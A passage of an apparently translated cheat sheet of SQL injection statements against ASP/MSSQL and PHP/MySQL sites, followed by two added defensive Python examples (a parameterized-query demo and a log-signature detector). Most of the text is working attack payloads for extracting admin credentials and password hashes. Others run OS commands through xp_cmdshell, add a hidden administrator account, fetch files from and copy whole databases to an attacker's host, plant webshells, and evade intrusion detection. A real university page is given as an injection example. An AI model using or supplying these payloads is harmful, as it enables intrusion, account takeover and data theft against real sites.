ASP/PHP SQL injection statement reference

Source: Internet
Author: User

Standard injection Statements

1. Determine whether there is a point of injection
; and 1=1 and 1=2
2. Guess the table name. Common table names are usually nothing more than admin, adminuser, user, pass, password and so on.
and 0<> (SELECT COUNT (*) from *)
and 0<> (SELECT COUNT (*) from admin)---Determine if the admin table exists
3. Guess the number of accounts. If 0< returns the correct page and 1< returns an error page, the number of accounts is 1.
and 0< (SELECT COUNT (*) from admin)
and 1< (SELECT COUNT (*) from admin)
4. Guess the field names: put the field name you are guessing inside the Len () parentheses.
and 1= (SELECT COUNT (*) from admin where Len (*) >0)--
and 1= (SELECT COUNT (*) from admin where Len (user field name) >0)
and 1= (SELECT COUNT (*) from admin where Len (password field name) >0)
5. Guess the length of each field: change the >0 comparison until the correct page is returned.
and 1= (SELECT COUNT (*) from admin where Len (*) >0)
and 1= (SELECT COUNT (*) from admin where Len (name) >6) error
and 1= (SELECT COUNT (*) from admin where Len (name) >5) The correct length is 6
and 1= (SELECT COUNT (*) from admin where Len (name) =6) is correct
and 1= (SELECT COUNT (*) from admin where Len (password) >11) is correct
and 1= (SELECT COUNT (*) from admin where Len (password) >12) error length 12
and 1= (SELECT COUNT (*) from admin where Len (password) =12) is correct
6. Guess the characters
and 1= (SELECT COUNT (*) from admin where left (name,1) =a)---Guess the first character of the user account
and 1= (SELECT COUNT (*) from admin where left (name,2) =ab)---Guess the second character of the user account
Add one character at a time until as many characters as the length found above have been guessed; that gives the account name.
and 1= (select top 1 count (*) from Admin where Asc (mid (pass,5,1)) =51)--
This query can also be used to guess Chinese user names and passwords: replace the number with the ASCII value of the Chinese character, then convert the result back to characters.
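Steps 1 to 6 all rely on one thing: the page responds differently depending on whether an appended condition is true. The following added example (not part of the original page) runs the step 1, 2 and 5 probes against a string-concatenated query and against a validated, parameterized one. It assumes an in-memory SQLite database with constructed data, a hypothetical `news` lookup, and SQLite's `length()` standing in for `Len()`.

```python
import re
import sqlite3

def make_db():
    """Constructed sample data: a news table plus the admin table the steps guess at."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, topic TEXT);
        CREATE TABLE admin (name TEXT, password TEXT);
        INSERT INTO news VALUES (1, 'hello');
        INSERT INTO admin VALUES ('sample', 'constructed12');
    """)
    return db

def lookup_concat(db, raw_id):
    """Vulnerable form: the request value becomes part of the SQL text."""
    return db.execute("SELECT topic FROM news WHERE id = " + raw_id).fetchall()

def lookup_bound(db, raw_id):
    """Hardened form: accept digits only, then bind the value as a parameter."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return []
    return db.execute("SELECT topic FROM news WHERE id = ?", (int(raw_id),)).fetchall()

# (condition expected true, condition expected false) for steps 1, 2 and 5.
PROBE_PAIRS = [
    ("1 and 1=1", "1 and 1=2"),
    ("1 and 0<>(select count(*) from admin)",
     "1 and 0<>(select count(*) from nosuch)"),
    ("1 and 1=(select count(*) from admin where length(name)>5)",
     "1 and 1=(select count(*) from admin where length(name)>6)"),
]

def observe(lookup, raw_id):
    """What the client can tell apart: 'page', 'empty' or 'error'."""
    db = make_db()
    try:
        rows = lookup(db, raw_id)
    except sqlite3.Error:
        return "error"
    finally:
        db.close()
    return "page" if rows else "empty"

def oracle_pairs(lookup):
    """Probe pairs whose two responses differ, i.e. each leaks one bit."""
    return [p for p in PROBE_PAIRS if observe(lookup, p[0]) != observe(lookup, p[1])]

if __name__ == "__main__":
    print("concatenated:", len(oracle_pairs(lookup_concat)), "leaking pairs")
    print("parameterized:", len(oracle_pairs(lookup_bound)), "leaking pairs")
```

With the bound query every probe produces the same empty response, so there is no true/false difference left to read table names, lengths or characters from.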
GROUP BY Users.id has 1=1--
Group by Users.id, Users.username, Users.password, Users.privs has 1=1--
; Insert into users values (666, Attacker, Foobar, 0xFFFF)--
UNION SELECT top 1 column_name from INFORMATION_SCHEMA.COLUMNS WHERE table_name=logintable-
UNION SELECT top 1 column_name from INFORMATION_SCHEMA.COLUMNS where table_name=logintable where column_name not in (login_id)-
UNION SELECT top 1 column_name from INFORMATION_SCHEMA.COLUMNS where table_name=logintable where column_name not in (login_id,login_name)-
UNION SELECT top 1 login_name from logintable-
UNION SELECT top 1 password from logintable where login_name=rahul--
Check the server's patch level (an error indicates the SP4 patch)
and 1= (SELECT @@VERSION)--
Check the permissions of the database connection account; a normal response proves it holds the sysadmin server role.
and 1= (SELECT is_srvrolemember (sysadmin))--
Determine the database connection account. (A normal response when testing for the sa account confirms the connection account is sa.)
and sa= (SELECT system_user)--
and user_name () =dbo--
and 0<> (select user_name ()--
Check whether xp_cmdshell has been deleted
and 1= (SELECT count (*) from master.dbo.sysobjects WHERE xtype = X and name = xp_cmdshell)--
If xp_cmdshell has been deleted, it can be restored; restoring from an absolute path is supported
; EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
; EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--
Reverse ping test against your own machine
; use Master;declare @s int;exec sp_oacreate "Wscript.Shell", @s out;exec sp_oamethod @s, "Run", NULL, "Cmd.exe/c ping 192.168.0.1";--
Add an account
;declare @shell INT exec sp_oacreate Wscript.Shell, @shell OUTPUT exec sp_oamethod @shell, Run,null, C:\winnt\system32\cmd.exe/c net user jiaoniang$ 1866574/add--
Create a virtual directory for drive E:
;declare @o int exec sp_oacreate Wscript.Shell, @o out exec sp_oamethod @o, run, NULL, Cscript.exe C:\Inetpub\wwwroot\mkwebdir.vbs-w "Default Web Site"-V "E", "E:\"-
Access properties (used together with writing a webshell):
DECLARE @o int exec sp_oacreate Wscript.Shell, @o out exec sp_oamethod @o, run, NULL, Cscript.exe c:\inetpub\wwwroot\chaccess.vbs-a w3svc/1/root/e +browse
Special tip: %5c=\ or change / and \ to %5 and submit
and 0<> (select top 1 paths from newtable)--
Get the database name (dbid 1 to 5 are system databases; 6 and above can be tested)
and 1= (select name from master.dbo.sysdatabases where dbid=7)--
and 0<> (SELECT COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid = 7, 8, 9 ... in turn to get more database names
and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype=u) reveals a table name, assumed here to be admin
and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype=u and name not in (Admin)) to get the other tables.
and 0<> (SELECT COUNT (*) from bbs.dbo.sysobjects where xtype=u and name=admin and uid> (str (ID))) reveals the UID value, assumed here to be 18779569 (uid=id)
and 0<> (select top 1 name from bbs.dbo.syscolumns where id=18779569) gets a field from admin, assumed here to be user_id
and 0<> (select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in (ID,...)) to reveal the other fields.
and 0< (select user_id from BBS.dbo.admin where username>1) can get the user name
The password can be obtained the same way, assuming fields such as user_id, username and password exist.
and 0<> (SELECT COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype=u) gets the table name
and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype=u and name not in (address))
and 0<> (SELECT COUNT (*) from bbs.dbo.sysobjects where xtype=u and name=admin and uid> (str (ID))) determines the ID value
and 0<> (select top 1 name from BBS.dbo.syscolumns where id=773577794) all fields
? id=-1 Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
? id=-1 Union Select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access)
Get the Web Path
; CREATE TABLE [dbo]. [Swap] ([Swappass][char] (255));--
and (select top 1 swappass from swap) =1--
; CREATE TABLE newtable (id int IDENTITY (1,1), paths varchar) Declare @test varchar () exec master..xp_regread @rootkey =HKEY_LOCAL_MACHINE, @key =system\currentcontrolset\services\W3svc\parameters\virtual roots\, @value_name=/, values= @test OUTPUT insert INTO paths (path) values (@test)--
; Use ku1;--
; CREATE table cmd (str image);--Create table cmd of image type
Test procedure when xp_cmdshell exists:
; exec master..xp_cmdshell dir
; exec master.dbo.sp_addlogin jiaoniang$;--add a SQL account
; exec master.dbo.sp_password null,jiaoniang$,1866574;--
; exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
; exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add;--
; exec master.dbo.xp_cmdshell net localgroup Administrators jiaoniang$/add;--
EXEC master..xp_servicecontrol start, schedule (start a service)
EXEC master..xp_servicecontrol start, server
; DECLARE @shell INT exec sp_oacreate Wscript.Shell, @shell OUTPUT exec sp_oamethod @shell, Run,null, C:\winnt\system32\cmd.exe/c NET user jiaoniang$ 1866574/add
;declare @shell INT exec sp_oacreate Wscript.Shell, @shell OUTPUT exec sp_oamethod @shell, Run,null, C:\WINNT\SYSTEM32\CMD.EXE/C net localgroup Administrators jiaoniang$/add
; EXEC master..xp_cmdshell tftp-i Youip Get file.exe--use TFTP to upload files
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_cm ' + ' dshell exec @a dir c:\
;declare @a;set @a=db_name (); Backup database @a to disk= your IP your shared directory Bak.dat
If that is restricted, you can use:
SELECT * FROM OPENROWSET (sqloledb,server;sa;,select ok! exec master.dbo.sp_addlogin Hax)
Query construction:
SELECT * FROM news WHERE id= ... and topic= ... And .....
Adminand 1= (SELECT COUNT (*) from [user] where Username=victim and right (left (userpass,01), 1) =1) and Userpass <>
Select 123;--
; Use master;--
: A or name like fff%;--shows a user named FFFF.
and 1<> (select count (email) from [user]);--
; Update [users] set email= (select top 1 name from sysobjects where Xtype=u and status>0) where name=ffff;--
; Update [users] set email= (select top 1 id from sysobjects where xtype=u and Name=ad) where name=ffff;--
; Update [users] set email= (select top 1 name from sysobjects where Xtype=u and id>581577110) where name=ffff;--
; Update [users] set email= (select top 1 count (IDs) from password) where name=ffff;--
; Update [users] set email= (select top 1 pwd from password where id=2) where name=ffff;--
; Update [users] set email= (select top 1 name from password where id=2) where name=ffff;--
The statements above take the name of the first user table in the database and place it in the email field of user ffff.
Viewing ffff's user profile then shows the first table, here called ad.
The ID of that table is then obtained from the table name ad, and used to get the name of the second table.
Insert into users values (666, char (0x63) +char (0x68) +char (0x72) +char (0x69) +char (0x73), char (0x63) +char (0x68) +char ( 0x72) +char (0x69) +char (0x73), 0xFFFF)--
Insert into users values (667,123,123,0XFFFF)--
Insert into users values (123, admin--, Password, 0xffff)--
; and user>0
; and (select COUNT (*) from sysobjects) >0
; and (select COUNT (*) from mysysobjects) >0//for an Access database
Name of the data table
Update AAA Set aaa= (select top 1 name from sysobjects where xtype=u and status>0);--
This updates the AAA field with the first table name.
After reading out the first table, the second can be read like this (add name<> the table name just obtained to the condition).
Update AAA Set aaa= (select top 1 name from sysobjects where xtype=u and status>0 and Name<>vote);--
Then id=1552 and exists (SELECT * from AAA where aaa>5)
This reads out the second table; keep going the same way until no more tables are returned.
Read the field like this:
Update AAA Set aaa= (select top 1 col_name (object_id (table name), 1));--
Then id=152 and exists (SELECT * from AAA where aaa>5) error, get field name
Update AAA Set aaa= (select top 1 col_name (object_id (table name), 2));--
Then id=152 and exists (SELECT * from AAA where aaa>5) error, get field name
[Get data table names] [Update a field value to the table name, then read the value of that field back to get the table name]
Update table name Set field = (select top 1 name from sysobjects where xtype=u and status>0 [and name<> each table name already obtained, adding one per table found]) [where condition] Select top 1 name from sysobjects where xtype=u and status>0 and name not in (Table1,table2,...)
Database administrator account and system administrator account through a SQL Server injection vulnerability [the current account must be in the sysadmin group]
[Get data table field names] [Update a field value to the field name, then read the value of that field back to get the field name]
Update table name Set field = (select top 1 col_name (object_id (data table name to query), field column such as: 1) [where condition]
Bypass IDS detection [using variables]
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_cm ' + ' dshell exec @a dir c:\
1. Open the remote database
Basic syntax
SELECT * FROM OPENROWSET (SQLOLEDB, server=servername;uid=sa;pwd=123, select * FROM table1)
Parameters: (1) OLE DB Provider name
2. The connection string parameter can specify any port to connect to, for example
SELECT * FROM OPENROWSET (SQLOLEDB, uid=sa;pwd=123; NETWORK=DBMSSOCN; address=192.168.0.1,1433, select * FROM table)
3. Copy the entire database of the target host by inserting all remote tables into local tables.
Basic syntax:
INSERT INTO OPENROWSET (SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) SELECT * FROM Table2
This statement copies all the data from the Table2 table on the target host to the Table1 table in the remote database. In practice, modify the IP address and port in the connection string to point where needed, for example:
Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * FROM table1) SELECT * FROM Table2
Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * from _sysdatabases)
SELECT * FROM master.dbo.sysdatabases
Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * from _sysobjects)
SELECT * FROM user_database.dbo.sysobjects
Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * from _syscolumns)
SELECT * FROM user_database.dbo.syscolumns
Copy the database:
Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * FROM table1) SELECT * from database. Table1
Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * FROM table2) SELECT * from database. Table2
Copy the password hashes: the hashes of login passwords are stored in sysxlogins. The method is as follows:
INSERT INTO OPENROWSET (SQLOLEDB, uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * from _sysxlogins) SELECT * FROM Database.dbo.sysxlogins
Once the hashes are obtained, they can be brute-forced.
Traversing directories: first create a temporary table, temp
CREATE table temp (ID nvarchar (255), Num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255));--
; Insert temp exec master.dbo.xp_availablemedia;--get all current drives
; INSERT into temp (ID) EXEC master.dbo.xp_subdirs c:\;--get a subdirectory list
; INSERT into temp (ID,NUM1) EXEC master.dbo.xp_dirtree c:\;--get the directory tree structure of all subdirectories and insert it into the temp table
; INSERT into temp (ID) EXEC master.dbo.xp_cmdshell type c:\web\index.asp;--view the contents of a file
; INSERT into temp (ID) exec master.dbo.xp_cmdshell dir c:\;--
; INSERT into temp (ID) exec master.dbo.xp_cmdshell dir c:\ *.asp/s/a;--
; INSERT into temp (ID) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
; INSERT into temp (ID,NUM1) EXEC master.dbo.xp_dirtree c:\;--(xp_dirtree can be run with public permissions)
Write to table:
Statement 1: and 1= (SELECT is_srvrolemember (sysadmin));--
Statement 2: and 1= (SELECT is_srvrolemember (serveradmin));--
Statement 3: and 1= (SELECT is_srvrolemember (setupadmin));--
Statement 4: and 1= (SELECT is_srvrolemember (securityadmin));--
Statement 5: and 1= (SELECT is_srvrolemember (securityadmin));--
Statement 6: and 1= (SELECT is_srvrolemember (diskadmin));--
Statement 7: and 1= (SELECT is_srvrolemember (bulkadmin));--
Statement 8: and 1= (SELECT is_srvrolemember (bulkadmin));--
Statement 9: and 1= (SELECT is_member (db_owner));--
Write the path to the table:
; Create table dirs (paths varchar (), ID int)--
; Insert dirs exec master.dbo.xp_dirtree c:\--
and 0<> (select top 1 paths from dirs)--
and 0<> (select top 1 paths from dirs where paths not in (@Inetpub))--
; Create table dirs1 (paths varchar (), ID int)--
; Insert dirs exec master.dbo.xp_dirtree e:\web--
and 0<> (select top 1 paths from dirs1)--
Back up the database to the Web directory for download:
;declare @a sysname; Set @a=db_name (); Backup Database @a to disk=e:\web\down.bak;--
and 1= (select top 1 name from (select top Id,name from sysobjects where xtype=char) T ORDER BY id DESC)
and 1= (Select top 1 col_name (object_id (User_login), 1) from sysobjects) refer to the related table.
and 1= (select user_id from User_login)
and 0= (select User from User_login where user>1)
-=- Wscript.Shell Example -=-
DECLARE @o int
exec sp_oacreate Wscript.Shell, @o out
EXEC sp_oamethod @o, run, NULL, notepad.exe
; DECLARE @o int exec sp_oacreate Wscript.Shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
declare @o int, @f int, @t int, @ret int
DECLARE @line varchar (8000)
exec sp_oacreate Scripting.FileSystemObject, @o out
exec sp_oamethod @o, OpenTextFile, @f out, C:\Boot.ini, 1
exec @ret = sp_oamethod @f, ReadLine, @line out
while (@ret = 0)
Begin
Print @line
exec @ret = sp_oamethod @f, ReadLine, @line out
End
declare @o int, @f int, @t int, @ret int
exec sp_oacreate Scripting.FileSystemObject, @o out
exec sp_oamethod @o, CreateTextFile, @f out, c:\inetpub\wwwroot\foo.asp, 1
exec @ret = sp_oamethod @f, WriteLine, NULL,
<% Set o = Server.CreateObject ("Wscript.Shell"): O.run (Request.QueryString ("cmd"))%>
declare @o int, @ret int
exec sp_oacreate Speech.voicetext, @o out
EXEC sp_oamethod @o, register, NULL, Foo, bar
EXEC sp_oasetproperty @o, speed, 150
exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528
WAITFOR DELAY 00:00:05
; declare @o int, @ret int exec sp_oacreate Speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
xp_dirtree applicable permissions: public
EXEC master.dbo.xp_dirtree C:\
The information returned has two fields, subdirectory and depth. The subdirectory field is a character type and the depth field is an integer type.
CREATE TABLE dirs (paths varchar (), id int)
The table built here matches the output of xp_dirtree above: the same number of fields with the same types.
Insert dirs exec master.dbo.xp_dirtree C:\
As long as we create a table whose definition matches the fields returned by the stored procedure, the insert can be executed. This writes the results into a table and, step by step, yields the information we want.


PHP+MySQL manual injection statements

Reveal the field count
ORDER BY num/*

Matching fields
and 1=1 Union Select 1,2,3,4,5.......n/*

Reveal the field positions
and 1=2 Union Select 1,2,3,4,5.....n/*

Using built-in functions to reveal database information
Version () database () User ()

Reveal database information without guessing usable fields (does not work on some sites):
and 1=2 UNION ALL Select Version ()/*
and 1=2 UNION ALL Select Database ()/*
and 1=2 union ALL Select User ()/*

Operating System Information:
and 1=2 UNION ALL SELECT @@global.version_compile_os from mysql.user/*

Database permissions:
and Ord (Mid (User (), 1, 1)) =114/* A normal response indicates root

Reveal databases (MySQL > 5.0)

MySQL 5 and above has a built-in information_schema database that stores the structure information of all MySQL databases and tables
and 1=2 Union select 1,2,3,schema_name,5,6,7,8,9,10 from INFORMATION_SCHEMA.SCHEMATA limit 0,1

Guess tables
and 1=2 Union select 1,2,3,table_name,5,6,7,8,9,10 from INFORMATION_SCHEMA.TABLES where table_schema=database name (hexadecimal) limit 0,1 (0 is the starting record, counting from 0; 1 means show 1 record)-

Guess fields
and 1=2 Union select 1,2,3,column_name,5,6,7,8,9,10 from INFORMATION_SCHEMA.COLUMNS where table_name=table name (hexadecimal) limit 0,1

Reveal passwords
and 1=2 Union Select 1,2,3, username field, 5,6,7, password field, 8,9 from table name limit 0,1

Advanced usage (one available field displays two data items):
Union Select 1,2,3,concat (username field, 0x3c, password field), 5,6,7,8,9 from table name limit 0,1

Write a webshell directly (root permission)
Conditions: 1. The site's physical path is known
2. Sufficient permissions (can be tested with Select .... from mysql.user)
3. magic_quotes_gpc () =off
Select ' <?php eval ($_post[cmd])?> ' into outfile ' physical path '
and 1=2 union ALL Select hex value of the one-line webshell into outfile ' path '

Common Load_file () paths:

1, replace (Load_file (0x2f6574632f706173737764), 0x3c,0x20)
2. Replace (Load_file (char (47,101,116,99,47,112,97,115,115,119,100)), char (60), char (32))
The two statements above are used to view the complete code of a PHP file. Sometimes, if certain characters are not replaced, for example "<" replaced with a space, the web page is returned and the code cannot be seen.
3, Load_file (char (47)) can list the root directory on FreeBSD and SunOS systems
4, /etc/httpd/conf/httpd.conf or /usr/local/apche/conf/httpd.conf view the Apache virtual host configuration file on Linux
5, C:\Program Files\apache group\apache\conf \httpd.conf or C:\apache\conf \httpd.conf view the Windows system Apache file
6, c:/resin-3.0.14/conf/resin.conf View JSP development of the website Resin file configuration information.
7, c:/resin/conf/resin.conf/usr/local/resin/conf/resin.conf view the Linux system configuration JSP virtual host
8, d:\APACHE\Apache2\conf\httpd.conf
9, C:\Program Files\mysql\my.ini
10, ../themes/darkblue_orange/layout.inc.php phpMyAdmin path disclosure
11. C:\windows\system32\inetsrv\MetaBase.xml View the IIS virtual host configuration file
12,/usr/local/resin-3.0.22/conf/resin.conf for 3.0.22 resin configuration file View
13,/usr/local/resin-pro-3.0.22/conf/resin.conf-ditto
14, /usr/local/app/apache2/conf/extra/httpd-vhosts.conf view Apache virtual hosts
15, /etc/sysconfig/iptables view the firewall policy
16, /usr/local/app/php5/lib/php.ini PHP-related settings
17, /etc/my.cnf MySQL configuration file
18, /etc/redhat-release Red Hat system version
19, C:\mysql\data\mysql\user.MYD stores the user passwords of the MySQL system
20, /etc/sysconfig/network-scripts/ifcfg-eth0 view the IP address
21, /usr/local/app/php5/lib/php.ini //PHP-related settings
22, /usr/local/app/apache2/conf/extra/httpd-vhosts.conf //virtual site settings
23, C:\Program Files\rhinosoft.com\serv-u\servudaemon.ini
24, C:\windows\my.ini
25, C:\Boot.ini
Common website configuration files: config.inc.php, config.php. Use Load_file () together with replace (Load_file (HEX), char (), char (32))
Note:
Char (60) indicates <
Char (32) denotes a space

Problems with manual injection:
When the injection page shows:
Illegal mix of collations (latin1_swedish_ci,implicit) and (utf8_general_ci,implicit) for operation ' UNION '
such as: Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file ( 0x433a5c626f6f742e696e69), 3,4,user ()%20
This is caused by inconsistent character encodings.
Workaround: wrap the parameter in Unhex (Hex (parameter)). The URL above can be changed to:
Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex (Hex ( Load_file (0x433a5c626f6f742e696e69)), 3,4,unhex (Hex (User ())%20
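
For defenders, the statements collected on this page translate directly into log signatures. The following added example (not part of the original page) decodes the query string of web access-log lines, undoes the comment and string-concatenation tricks shown above, and tags each request with the matching statement family. The rule names, the log layout and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus

# Signatures drawn from the statements on this page; rule names are made up here.
RULES = {
    "mssql_os_exec": re.compile(
        r"\b(xp_cmdshell|sp_oacreate|sp_oamethod|sp_addextendedproc)\b"),
    "mssql_recon": re.compile(
        r"\b(xp_dirtree|xp_regread|xp_subdirs|is_srvrolemember|"
        r"sysobjects|syscolumns|sysdatabases)\b|@@version"),
    "mssql_remote_copy": re.compile(r"\bopenrowset\s*\("),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "mysql_file_io": re.compile(r"\bload_file\s*\(|\binto\s+outfile\b"),
    "boolean_probe": re.compile(
        r"\band\s+\d+\s*(=|<>|<|>)\s*(\d+|\(\s*select\b)"),
}

LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

def normalize(query):
    """Decode and flatten a query string so the signatures see the real SQL."""
    text = unquote(unquote_plus(query))          # up to two layers of URL encoding
    text = text.lower()
    text = re.sub(r"/\*.*?\*/", " ", text)       # /**/ used in place of spaces
    text = re.sub(r"'\s*\+\s*'", "", text)       # 'xp_'+'cmdshell' -> 'xp_cmdshell'
    return re.sub(r"\s+", " ", text)

def classify(query):
    """Sorted names of every rule that matches the normalized query."""
    text = normalize(query)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(lines):
    """Return (client, path, rules) for each log line with at least one hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        path, _, query = target.partition("?")
        rules = classify(query)
        if rules:
            hits.append((client, path, rules))
    return hits

# Constructed sample log lines (documentation address ranges, hypothetical paths).
SAMPLE_LOG = """
198.51.100.4 - - [10/Oct/2023:13:55:36 +0000] "GET /news.asp?id=13 HTTP/1.1" 200 5120
198.51.100.4 - - [10/Oct/2023:13:55:40 +0000] "GET /search.php?q=information+security HTTP/1.1" 200 901
203.0.113.7 - - [10/Oct/2023:14:01:02 +0000] "GET /news.asp?id=13%20and%201=2 HTTP/1.1" 200 312
203.0.113.7 - - [10/Oct/2023:14:01:09 +0000] "GET /news.asp?id=13%20and%200%3C%3E(select%20count(*)%20from%20admin) HTTP/1.1" 500 88
203.0.113.9 - - [10/Oct/2023:14:07:30 +0000] "GET /view.php?id=-1+union/**/select+1,load_file(0x2f6574632f706173737764),3 HTTP/1.1" 200 740
203.0.113.9 - - [10/Oct/2023:14:08:11 +0000] "GET /news.asp?id=1;declare%20@a%20sysname%20set%20@a='xp_'%2B'cmdshell'%20exec%20@a%20'dir' HTTP/1.1" 500 91
""".strip().splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Signatures like these are a triage aid only: the variable-based "Bypass IDS detection" statements above show why matching must follow normalization, and why parameterized queries and a least-privilege database account remain the actual fix.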
